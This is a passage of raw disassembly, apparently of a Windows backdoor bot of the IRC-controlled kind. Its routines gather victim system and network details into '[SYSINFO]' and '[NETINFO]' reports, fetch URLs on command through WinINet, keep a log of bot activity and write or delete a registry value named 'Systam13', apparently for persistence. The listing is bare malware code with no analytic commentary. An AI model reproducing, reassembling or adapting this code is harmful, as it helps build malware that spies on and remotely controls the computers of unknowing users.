sub_40B56C endp
; =============== S U B R O U T I N E =======================================
sub_40B721 proc near ; CODE XREF: sub_407110+74�p
; sub_40B8D8+217�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_424058 ;; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_43B12C
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_41782A
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40B721 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B78A proc near ; CODE XREF: sub_409037+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_424144 ;; GetVersionExA
test eax, eax
jz short loc_40B81D
cmp [ebp+var_90], 4
jnz short loc_40B7F3
cmp [ebp+var_8C], esi
jnz short loc_40B7DB
cmp [ebp+var_84], 1
jnz short loc_40B7CE
push 1
pop esi
loc_40B7CE: ; CODE XREF: sub_40B78A+3F�j
cmp [ebp+var_84], 2
jnz short loc_40B81D
push 1
jmp short loc_40B81C
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40B78A+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_40B7E8
loc_40B7E4: ; CODE XREF: sub_40B78A+78�j
push 2
jmp short loc_40B81C
; ---------------------------------------------------------------------------
loc_40B7E8: ; CODE XREF: sub_40B78A+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_40B81D
jmp short loc_40B80D
; ---------------------------------------------------------------------------
loc_40B7F3: ; CODE XREF: sub_40B78A+2E�j
cmp [ebp+var_90], 5
jnz short loc_40B81D
cmp [ebp+var_8C], esi
jz short loc_40B7E4
cmp [ebp+var_8C], 1
jnz short loc_40B811
loc_40B80D: ; CODE XREF: sub_40B78A+67�j
push 3
jmp short loc_40B81C
; ---------------------------------------------------------------------------
loc_40B811: ; CODE XREF: sub_40B78A+81�j
cmp [ebp+var_8C], 2
jnz short loc_40B81D
push 7
loc_40B81C: ; CODE XREF: sub_40B78A+4F�j
; sub_40B78A+5C�j ...
pop esi
loc_40B81D: ; CODE XREF: sub_40B78A+25�j
; sub_40B78A+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_40B78A endp
; =============== S U B R O U T I N E =======================================
sub_40B822 proc near ; CODE XREF: sub_40B8D8+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_40B82A: ; CODE XREF: sub_40B822+2F�j
; sub_40B822+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call ds:dword_424064 ;; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_419250
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_40B82A
jb short loc_40B859
cmp ebx, esi
ja short loc_40B82A
loc_40B859: ; CODE XREF: sub_40B822+31�j
push 0
push 64h
push edi
push ebx
call sub_4191D0
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_40B8CC
jb short loc_40B878
cmp esi, 50h
jnb short loc_40B87D
loc_40B878: ; CODE XREF: sub_40B822+4F�j
push 4Bh
xor edx, edx
pop eax
loc_40B87D: ; CODE XREF: sub_40B822+54�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B888
cmp esi, 47h
jnb short loc_40B88D
loc_40B888: ; CODE XREF: sub_40B822+5F�j
push 42h
xor edx, edx
pop eax
loc_40B88D: ; CODE XREF: sub_40B822+64�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B898
cmp esi, 37h
jnb short loc_40B89D
loc_40B898: ; CODE XREF: sub_40B822+6F�j
push 32h
xor edx, edx
pop eax
loc_40B89D: ; CODE XREF: sub_40B822+74�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B8A8
cmp esi, 26h
jnb short loc_40B8AD
loc_40B8A8: ; CODE XREF: sub_40B822+7F�j
push 21h
xor edx, edx
pop eax
loc_40B8AD: ; CODE XREF: sub_40B822+84�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B8B8
cmp esi, 1Eh
jnb short loc_40B8BD
loc_40B8B8: ; CODE XREF: sub_40B822+8F�j
push 19h
xor edx, edx
pop eax
loc_40B8BD: ; CODE XREF: sub_40B822+94�j
test ecx, ecx
ja short loc_40B8CC
jb short loc_40B8C8
cmp esi, 0Ah
jnb short loc_40B8CC
loc_40B8C8: ; CODE XREF: sub_40B822+9F�j
xor eax, eax
xor edx, edx
loc_40B8CC: ; CODE XREF: sub_40B822+4D�j
; sub_40B822+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_40B822 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8D8 proc near ; CODE XREF: sub_40EE72+59EE�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_436EDC
mov [ebp+var_CC], 94h
call ds:dword_424144 ;; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_40B95F
cmp [ebp+var_C4], ebx
jnz short loc_40B93B
cmp [ebp+var_BC], 1
jnz short loc_40B925
mov [ebp+var_4], offset a95 ; "95"
loc_40B925: ; CODE XREF: sub_40B8D8+44�j
cmp [ebp+var_BC], 2
jnz loc_40B9DA
mov [ebp+var_4], offset aNt ; "NT"
jmp short loc_40B9AB
; ---------------------------------------------------------------------------
loc_40B93B: ; CODE XREF: sub_40B8D8+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_40B94D
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B94D: ; CODE XREF: sub_40B8D8+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_40B99B
mov [ebp+var_4], offset aMe ; "ME"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B95F: ; CODE XREF: sub_40B8D8+33�j
cmp [ebp+var_C8], 5
jnz short loc_40B99B
cmp [ebp+var_C4], ebx
jnz short loc_40B979
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B979: ; CODE XREF: sub_40B8D8+96�j
cmp [ebp+var_C4], 1
jnz short loc_40B98B
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_40B9A2
; ---------------------------------------------------------------------------
loc_40B98B: ; CODE XREF: sub_40B8D8+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_40B9A2
loc_40B99B: ; CODE XREF: sub_40B8D8+7C�j
; sub_40B8D8+8E�j
mov [ebp+var_4], offset dword_42DDDC
loc_40B9A2: ; CODE XREF: sub_40B8D8+73�j
; sub_40B8D8+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_40B9DA
loc_40B9AB: ; CODE XREF: sub_40B8D8+61�j
cmp [ebp+var_B8], bl
jz short loc_40B9DA
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset dword_42DDD4
push eax
call sub_4172B0
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_40B9DA: ; CODE XREF: sub_40B8D8+54�j
; sub_40B8D8+D1�j ...
mov ax, ds:word_42DDD0
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, ds:dword_43AC84
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_40BA13
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_40BA13: ; CODE XREF: sub_40B8D8+12C�j
push [ebp+arg_4]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43ADD8 ;; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_43AD50 ;; gethostbyaddr
cmp eax, ebx
jz short loc_40BA3C
push dword ptr [eax]
jmp short loc_40BA41
; ---------------------------------------------------------------------------
loc_40BA3C: ; CODE XREF: sub_40B8D8+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_40BA41: ; CODE XREF: sub_40B8D8+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_4172B0
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call ds:dword_424068 ;; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_42409C ;; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_424098 ;; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call ds:dword_424148 ;; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_4192B8
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_40D12A
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_40B721
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
call sub_40B822
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+arg_0]
call sub_41782A
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_40B8D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB8C proc near ; CODE XREF: sub_40EE72+4555�p
; sub_40EE72+5A1F�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_417330
add esp, 0Ch
cmp ds:dword_43AE80, 0
jnz short loc_40BBF8
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call ds:dword_43AC68 ;; InternetGetConnectedStateEx
test eax, eax
jnz short loc_40BBE1
lea eax, [ebp+var_8C]
push offset dword_42DE50
push eax
call sub_4172B0
pop ecx
pop ecx
loc_40BBE1: ; CODE XREF: sub_40BB8C+40�j
test [ebp+var_C], 1
jz short loc_40BBEE
push offset dword_42DE48
jmp short loc_40BBF3
; ---------------------------------------------------------------------------
loc_40BBEE: ; CODE XREF: sub_40BB8C+59�j
push offset off_42DE44
loc_40BBF3: ; CODE XREF: sub_40BB8C+60�j
lea eax, [ebp+var_8]
jmp short loc_40BC10
; ---------------------------------------------------------------------------
loc_40BBF8: ; CODE XREF: sub_40BB8C+28�j
mov esi, offset off_42DE40
lea eax, [ebp+var_8]
push esi
push eax
call sub_4172B0
pop ecx
lea eax, [ebp+var_8C]
pop ecx
push esi
loc_40BC10: ; CODE XREF: sub_40BB8C+6A�j
push eax
call sub_4172B0
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+arg_0]
call sub_41782A
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_40BB8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC4B proc near ; DATA XREF: sub_40EE72+4974�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_42DF80
call sub_417330
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_417330
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_417330
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_417330
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_417330
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call ds:dword_43ACA0 ;; InternetCrackUrlA
test eax, eax
jz loc_40BDE5
cmp [ebp+var_34], ebx
jbe short loc_40BD22
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD22: ; CODE XREF: sub_40BC4B+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_40BD40
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD40: ; CODE XREF: sub_40BC4B+DE�j
cmp [ebp+var_20], ebx
jbe short loc_40BD5A
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD5A: ; CODE XREF: sub_40BC4B+F8�j
cmp [ebp+var_18], ebx
jbe short loc_40BD74
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_418C10
add esp, 0Ch
loc_40BD74: ; CODE XREF: sub_40BC4B+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push ds:dword_43AD48
call ds:dword_43AD6C ;; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_40BDFD
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call ds:dword_43AD60 ;; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40BE04
push ebx
push ebx
push ebx
push ebx
push eax
call ds:dword_43AD14 ;; HttpSendRequestA
test eax, eax
jz short loc_40BDDE
push offset dword_42DF54
jmp short loc_40BE09
; ---------------------------------------------------------------------------
loc_40BDDE: ; CODE XREF: sub_40BC4B+18A�j
push offset unk_42DF08
jmp short loc_40BE09
; ---------------------------------------------------------------------------
loc_40BDE5: ; CODE XREF: sub_40BC4B+B7�j
lea eax, [ebp+var_55C]
push offset dword_42DEDC
push eax
call sub_4172B0
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_40BE17
; ---------------------------------------------------------------------------
loc_40BDFD: ; CODE XREF: sub_40BC4B+153�j
push offset unk_42DEA0
jmp short loc_40BE09
; ---------------------------------------------------------------------------
loc_40BE04: ; CODE XREF: sub_40BC4B+17B�j
push offset unk_42DE60
loc_40BE09: ; CODE XREF: sub_40BC4B+191�j
; sub_40BC4B+198�j ...
lea eax, [ebp+var_55C]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_40BE17: ; CODE XREF: sub_40BC4B+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_40BE42
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_40D679
add esp, 14h
loc_40BE42: ; CODE XREF: sub_40BC4B+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_40BF6D
pop ecx
push esi
call ds:dword_43ADCC ;; InternetCloseHandle
push [ebp+var_4]
call ds:dword_43ADCC ;; InternetCloseHandle
push [ebp+var_1D8]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
pop ebx
sub_40BC4B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE75 proc near ; CODE XREF: sub_40EE72+448E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_43FA70
mov edi, 0B8h
loc_40BE89: ; CODE XREF: sub_40BE75+33�j
cmp byte ptr [esi], 0
jz short loc_40BEAC
push [ebp+arg_0]
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40BEAC
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_4405F0
jl short loc_40BE89
jmp short loc_40BEEE
; ---------------------------------------------------------------------------
loc_40BEAC: ; CODE XREF: sub_40BE75+17�j
; sub_40BE75+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_43FA70[esi]
push ebx
call sub_417330
push 17h
push [ebp+arg_0]
push ebx
call sub_418C10
push 9Fh
lea eax, dword_43FA88[esi]
push [ebp+arg_4]
push eax
call sub_418C10
add esp, 24h
inc ds:dword_42F794
pop ebx
loc_40BEEE: ; CODE XREF: sub_40BE75+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_40BE75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEF5 proc near ; CODE XREF: sub_40EE72+5B58�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_42DF90
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
xor edi, edi
mov esi, offset dword_43FA70
loc_40BF1F: ; CODE XREF: sub_40BEF5+72�j
cmp byte ptr [esi], 0
jz short loc_40BF5A
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_42DF84
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41782A
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 2Ch
loc_40BF5A: ; CODE XREF: sub_40BEF5+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_4405F0
jl short loc_40BF1F
pop edi
pop esi
leave
retn
sub_40BEF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF6D proc near ; CODE XREF: sub_401000+9A�p
; sub_4010B5+314�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_42406C ;; GetLocalTime
mov ebx, offset dword_43F164
mov edi, 80h
mov esi, offset dword_43B164
loc_40BF8F: ; CODE XREF: sub_40BF6D+3D�j
cmp byte ptr [ebx], 0
jz short loc_40BFA6
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_418C10
add esp, 0Ch
loc_40BFA6: ; CODE XREF: sub_40BF6D+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_40BF8F
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41782A
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_40BF6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFE1 proc near ; CODE XREF: sub_407BDE+15B�p
; sub_407D66+1AF�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_4193FF
lea eax, [ebp+var_80]
push eax
call sub_40BF6D
add esp, 14h
leave
retn
sub_40BFE1 endp
; =============== S U B R O U T I N E =======================================
sub_40C00D proc near ; CODE XREF: sub_40EE72+5A4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_43B164
xor ecx, ecx
loc_40C014: ; CODE XREF: sub_40C00D+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_43F164
jl short loc_40C014
cmp [esp+arg_C], ecx
push esi
mov esi, offset dword_42DFC4
jnz short loc_40C044
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_40D679
add esp, 14h
loc_40C044: ; CODE XREF: sub_40C00D+1F�j
push esi
call sub_40BF6D
pop ecx
pop esi
retn
sub_40C00D endp
; =============== S U B R O U T I N E =======================================
sub_40C04D proc near ; CODE XREF: sub_402DD7+2AE�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_43B164
loc_40C053: ; CODE XREF: sub_40C04D+27�j
cmp byte ptr [esi], 0
jz short loc_40C068
push [esp+4+arg_0]
push esi
call sub_40A96F
pop ecx
test eax, eax
pop ecx
jnz short loc_40C07A
loc_40C068: ; CODE XREF: sub_40C04D+9�j
add esi, 80h
cmp esi, offset dword_43F164
jl short loc_40C053
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40C07A: ; CODE XREF: sub_40C04D+19�j
push 1
pop eax
pop esi
retn
sub_40C04D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C07F proc near ; DATA XREF: sub_40EE72+5B02�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_40C0D2
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_42E018
push eax
push [ebp+var_11C]
call sub_40D679
add esp, 14h
loc_40C0D2: ; CODE XREF: sub_40C07F+33�j
cmp [ebp+var_98], 0
jz short loc_40C0F2
lea eax, [ebp+var_98]
push eax
call sub_41781F
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_40C0F2
mov [ebp+var_8], eax
loc_40C0F2: ; CODE XREF: sub_40C07F+5A�j
; sub_40C07F+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_43B164
loc_40C0FB: ; CODE XREF: sub_40C07F+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_40C155
cmp byte ptr [esi], 0
jz short loc_40C144
cmp [ebp+var_98], 0
jz short loc_40C12A
cmp [ebp+var_4], 0
jnz short loc_40C12A
lea eax, [ebp+var_98]
push eax
push esi
call sub_40A96F
pop ecx
test eax, eax
pop ecx
jz short loc_40C144
loc_40C12A: ; CODE XREF: sub_40C07F+90�j
; sub_40C07F+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_40D679
add esp, 14h
loc_40C144: ; CODE XREF: sub_40C07F+87�j
; sub_40C07F+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_43F164
jl short loc_40C0FB
loc_40C155: ; CODE XREF: sub_40C07F+82�j
lea eax, [ebp+var_31C]
push offset dword_42DFEC
push eax
call sub_4172B0
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_40C18F
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_40D679
add esp, 14h
loc_40C18F: ; CODE XREF: sub_40C07F+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_40BF6D
push [ebp+var_18]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_40C07F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C1AE proc near ; CODE XREF: sub_40AC42+1E�p
; sub_40E6A9+346�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_42E038
xor esi, esi
mov ebx, offset aSystam13 ; "Systam13"
loc_40C1C1: ; CODE XREF: sub_40C1AE+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call ds:dword_43AD4C ;; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40C1FB
push [ebp+arg_0]
call sub_417AB0
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call ds:dword_43ADBC ;; RegSetValueExA
jmp short loc_40C205
; ---------------------------------------------------------------------------
loc_40C1FB: ; CODE XREF: sub_40C1AE+2F�j
push ebx
push [ebp+var_4]
call ds:dword_43AD04 ;; RegDeleteValueA
loc_40C205: ; CODE XREF: sub_40C1AE+4B�j
push [ebp+var_4]
call ds:dword_43AD74 ;; RegCloseKey
add edi, 8
cmp edi, offset dword_42E050
jb short loc_40C1C1
pop edi
pop esi
pop ebx
leave
retn
sub_40C1AE endp
; =============== S U B R O U T I N E =======================================
sub_40C21E proc near ; CODE XREF: sub_40C259+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_40C253
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_40C237: ; CODE XREF: sub_40C21E+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_424298[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_40C237
pop edi
pop ebx
